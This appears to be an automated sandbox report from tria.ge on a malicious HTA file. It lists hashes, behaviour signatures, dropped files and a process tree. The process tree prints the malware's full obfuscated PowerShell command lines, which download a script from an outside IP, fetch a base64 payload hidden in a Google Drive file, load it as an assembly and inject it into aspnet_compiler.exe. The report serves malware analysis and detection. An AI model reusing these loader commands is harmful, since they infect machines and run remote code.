Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/11/2024, 03:53

General

  • Target

    d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta

  • Size

    207KB

  • MD5

    21bf484c8fe4564e1f0e0fc0aa522199

  • SHA1

    0bda2d5048d1555ef9ef50f4fd192c0838677c94

  • SHA256

    d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6

  • SHA512

    1dbf4a2f78b482b6d80eb48c9c2434a8907081a468c820ad9085fcede6134fe41c8c27a3e8f2ad7fa3f1d702e2b0904d885bfda8300ced9c4924c6e869e9baea

  • SSDEEP

    96:43F97gSlqxRtwJPcEI/MOoMQbvfhKGAfQ:43F1OxvmUxevfU3Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 34 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4744
    • C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe
      "C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'JEY2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSmtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVudktEYVVrdUgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWG9XdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRpaVh2ZEYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNWWNsQ2xJSEdibiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbk51UElVamZUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC4yMy83OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZXJsb3Zlci50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhncmVhdG1hZ2ljYWx0aGluZ3N3aXRoaGUudmJzIiwwLDApO3NUYXJULXNMRWVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZS52YnMi'+[ChAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2476
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp" "c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4816
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCcxamdpbScrJ2FnZVVybCA9IDViSmh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIDViSjsxamd3ZWJDbGllbnQgPSBOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzFqJysnZ2ltYWdlQnl0ZXMgPSAxamd3ZWJDbGllbnQuRG93bmxvYWREYXRhKDFqZ2ltYWdlVXJsKTsxamdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOicrJzpVVEY4LkdldFN0cmluZygxamdpbWFnZUJ5JysndGVzKTsxamdzdGFydEZsYWcgPSAnKyc1Yko8PEJBU0U2NF9TVEFSVD4+NWJKOzFqZ2VuZEZsYWcgPSA1Yko8PCcrJ0JBU0U2NF9FTkQ+PjViSjsxamdzdGFydEluZGV4ID0nKycgMWpnaW1hZ2VUZXh0LicrJ0knKyduZGV4T2YoMWpnc3RhcnRGbGFnKTsxamdlbmRJbmRleCA9IDFqZ2knKydtYWdlVGV4dC5JbmRleE8nKydmKDFqZ2VuZEZsYWcpOzFqZ3N0YXJ0SW5kZXggLWdlICcrJzAgLWFuZCAxamdlbmRJbmRleCAtZ3QgMWpnc3RhcnRJbmRleDsxamdzdGFydEluZGV4ICs9IDFqZ3N0YXJ0RmxhZy5MZW5ndGg7MWpnYmFzZTY0JysnTGVuZ3RoID0gMWpnZW5kSW5kZXggLSAxamdzdGFydEluZGV4OzFqZ2JhJysnc2U2NENvbW1hbmQgPSAxamdpbWFnZVRleHQuU3Vic3RyaW5nJysnKDFqZ3N0YXJ0SW5kZXgsIDFqZ2Jhc2U2NExlbmd0aCk7MWpnYmFzZTY0UmV2ZScrJ3JzZWQgPSAtam9pbiAoMWpnYmFzZTY0Q29tbWEnKyduZC5Ub0NoYXJBcnJheSgpIDE1biBGb3JFYWNoLU9iamVjdCB7IDFqZ18gfSlbLTEuLi0oMWpnYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTsxamdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nKDFqZ2Jhc2U2NFJldmVyc2VkKTsxamdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06JysnOkxvYWQoMWpnY29tbWFuZEJ5dGVzKTsxamd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDViSlZBSTViSik7MWpndmFpTWV0aG8nKydkLkludm9rZSgxamdudWxsLCBAKDViSnR4dC5GQ0RSVy85Ny8zMi40LjM3MS43MDEvLzpwdHRoNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YicrJ0pkZXNhdGl2YWRvNWJKLCA1Ykphc3BuZXRfY29tcGlsZXI1YkosIDViSmRlc2F0aXZhZG81YkosIDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSjE1YkosNWJKZGVzYXRpdmFkbzViSikpOycpLlJlcGxhY0UoJzViSicsW1NUcklOZ11bQ2hhUl0zOSkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdNTMrW0NoYVJdMTEwKSxbU1RySU5nXVtDaGFSXTEyNCkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdMTA2K1tDaGFSXTEwMyksJyQnKXwgJiAoKGd2ICcqbWRyKicpLm5hTWVbMywxMSwyXS1KT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2744
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              6⤵
                PID:3648
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                6⤵
                  PID:4204
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  6⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:720
        • C:\Windows\SysWOW64\ieUnatt.exe
          "C:\Windows\SysWOW64\ieUnatt.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:724
          • C:\Program Files\Mozilla Firefox\Firefox.exe
            "C:\Program Files\Mozilla Firefox\Firefox.exe"
            3⤵
              PID:440

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\poWERSHElL.EXe.log

          Filesize

          2KB

          MD5

          3d086a433708053f9bf9523e1d87a4e8

          SHA1

          b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

          SHA256

          6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

          SHA512

          931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          12KB

          MD5

          ce1bcfc9190c6cfda08148fb743882a2

          SHA1

          23a4d112625e8691f4347f3b281fe3b14ad15e92

          SHA256

          b66a07448dc9682b36c3f6ee59fd713a98fb78af01d20ba6faf6b19412ce1556

          SHA512

          862da3622fb6ff94e70da2b7efd139eeab8041fb911777f5140a8a9d3d3020d64a5d48dbfbb27ad9e20baa66c8fb2b309ea7c7f36ecb07be5c3c2a943668c0ab

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          7eb358f916ead42489c03b8d0e109df4

          SHA1

          1cb6bbf55dec6ff98dd9064704d5329384472caf

          SHA256

          207ed2190f1c5d0bad439c5c09ea1129c14f71edbdc922468dee9b960bce8d9f

          SHA512

          5641ea86ebd53afb29e28d5b63f825636dc1855f4ed1d52f8a302ab7b8c5abe3f2f661ba80cdc2a9cba250a0088d3e0c7620ae88e5d9ae64fd7dae1cfb84b178

        • C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.dll

          Filesize

          3KB

          MD5

          e32db995d7c04aa9abc2adb3cb78e3b6

          SHA1

          c761f8e511f66e5cc2cf4fba9096ae8be53d0dac

          SHA256

          2b97843d7061a685d3a58b55ece4a03031f64f3b818622776f2050251adb8bda

          SHA512

          ffcf13696ba920be2eac92bacc60fb9975200d1c8343946a6907588fa966bca84dcb375c236fa7682740550e528f29a5ebd3377e6c7ab67988e9e01c8aadfb93

        • C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp

          Filesize

          1KB

          MD5

          5ac3e7b2c8b665309085844070338689

          SHA1

          d227ed68e70ffd96cdb3205ee8c8cf9501e9511a

          SHA256

          dff206519b65ae94d2078dcf7db3378911060aa2598f309ccaef16b316768b44

          SHA512

          81b017d2f40d60d2022d0409bcd62a04ac35f607b6499e8880fc3b4d83e7d0aa215b27bff8503a61d09cf939b5d83a714d897d0c33ccf307b81f9f101820201c

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tinfclgi.1a0.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs

          Filesize

          138KB

          MD5

          3a172f4d749a3cf2a42e0b7df638c8d3

          SHA1

          071d3b7db5a649ec3252af5b5a21ed047e71c785

          SHA256

          fe03066a9d3659d5f1e5941c7a73646780d55d15a57a9dde5901f469db2ead72

          SHA512

          30cc1c96d8cae17800f33f63d7ef8965536051ee7ec683b45e5c62079bf9487785ccc9b8ae8ab073f25f9059f1bbf84f73f8c8ff68c807c0e7007d597dced0d7

        • \??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.0.cs

          Filesize

          480B

          MD5

          02801ca1be5cf5616a9f398c85c263db

          SHA1

          e9000f0b5cd0dceb296fb59f9ed2c85717666377

          SHA256

          6d63144887d63ca3c8794b18c2e2283a7f5e6fdc5355fb24c0c3e7d11a172586

          SHA512

          4a27658c15203dd2122759a70db7f2917eb7a8899f9590f80a01b95d55a0631d0fce21d1ca6c9ec4111aabb7d9bdb9396f6483e42bb10850e9a9305d21616902

        • \??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline

          Filesize

          369B

          MD5

          9f189319c7026f4c8c2bc274b31dcbc1

          SHA1

          3d7cf616092e9342ffe58dbf0141a5e897c0c821

          SHA256

          4c87877673281431e8360baad648f64cdd3492b8959830f13c4350c0ce5ea398

          SHA512

          f017ba488a6104f6eeed822944c73a5d3e69b214efe71a53876e1fd1fa4fb331d3d0cc64af14daa7b871ab357bce5047efd8a01942e153a66c7765360a3e6fba

        • \??\c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP

          Filesize

          652B

          MD5

          f26b3a26ab9c4a46fde242aaaca9a332

          SHA1

          2dbb75a8f5c366597503e49e17225fea551e4aef

          SHA256

          6c13e7351b8e2dab0b4ca221f593ca473762d9b78d1bfb3a0d3f6c8e1f662270

          SHA512

          9531d901c1958a367bcf0f0426f30035f7ef681dcb94a12bd3bce25cbc92af4f35a3625382e3f57eb7baa5158fbde5b64e35beaad82199eae18aee4daa07e135

        • memory/440-117-0x0000023B33A20000-0x0000023B33B37000-memory.dmp

          Filesize

          1.1MB

        • memory/720-104-0x0000000000400000-0x0000000000446000-memory.dmp

          Filesize

          280KB

        • memory/724-108-0x0000000000800000-0x0000000000843000-memory.dmp

          Filesize

          268KB

        • memory/724-109-0x0000000000800000-0x0000000000843000-memory.dmp

          Filesize

          268KB

        • memory/2476-29-0x00000000078D0000-0x0000000007902000-memory.dmp

          Filesize

          200KB

        • memory/2476-41-0x0000000007910000-0x00000000079B3000-memory.dmp

          Filesize

          652KB

        • memory/2476-42-0x0000000008090000-0x000000000870A000-memory.dmp

          Filesize

          6.5MB

        • memory/2476-43-0x0000000007A40000-0x0000000007A5A000-memory.dmp

          Filesize

          104KB

        • memory/2476-44-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

          Filesize

          40KB

        • memory/2476-45-0x0000000007CD0000-0x0000000007D66000-memory.dmp

          Filesize

          600KB

        • memory/2476-46-0x0000000007C40000-0x0000000007C51000-memory.dmp

          Filesize

          68KB

        • memory/2476-47-0x0000000007C70000-0x0000000007C7E000-memory.dmp

          Filesize

          56KB

        • memory/2476-48-0x0000000007C80000-0x0000000007C94000-memory.dmp

          Filesize

          80KB

        • memory/2476-49-0x0000000007D90000-0x0000000007DAA000-memory.dmp

          Filesize

          104KB

        • memory/2476-50-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

          Filesize

          32KB

        • memory/2476-40-0x00000000078B0000-0x00000000078CE000-memory.dmp

          Filesize

          120KB

        • memory/2476-30-0x000000006D480000-0x000000006D4CC000-memory.dmp

          Filesize

          304KB

        • memory/2744-103-0x0000000007E60000-0x0000000007EFC000-memory.dmp

          Filesize

          624KB

        • memory/2744-102-0x0000000007D00000-0x0000000007E58000-memory.dmp

          Filesize

          1.3MB

        • memory/2892-91-0x0000000005B60000-0x0000000005EB4000-memory.dmp

          Filesize

          3.3MB

        • memory/3824-81-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-19-0x0000000005C30000-0x0000000005C7C000-memory.dmp

          Filesize

          304KB

        • memory/3824-72-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-73-0x0000000006F60000-0x0000000006F82000-memory.dmp

          Filesize

          136KB

        • memory/3824-74-0x0000000008010000-0x00000000085B4000-memory.dmp

          Filesize

          5.6MB

        • memory/3824-13-0x00000000055C0000-0x0000000005914000-memory.dmp

          Filesize

          3.3MB

        • memory/3824-7-0x0000000005550000-0x00000000055B6000-memory.dmp

          Filesize

          408KB

        • memory/3824-6-0x00000000054E0000-0x0000000005546000-memory.dmp

          Filesize

          408KB

        • memory/3824-71-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

          Filesize

          4KB

        • memory/3824-18-0x0000000005BA0000-0x0000000005BBE000-memory.dmp

          Filesize

          120KB

        • memory/3824-65-0x0000000006160000-0x0000000006168000-memory.dmp

          Filesize

          32KB

        • memory/3824-0-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

          Filesize

          4KB

        • memory/3824-5-0x0000000005390000-0x00000000053B2000-memory.dmp

          Filesize

          136KB

        • memory/3824-4-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-2-0x0000000070BC0000-0x0000000071370000-memory.dmp

          Filesize

          7.7MB

        • memory/3824-3-0x0000000004CF0000-0x0000000005318000-memory.dmp

          Filesize

          6.2MB

        • memory/3824-1-0x00000000045E0000-0x0000000004616000-memory.dmp

          Filesize

          216KB

        • memory/4744-110-0x0000000005480000-0x0000000005564000-memory.dmp

          Filesize

          912KB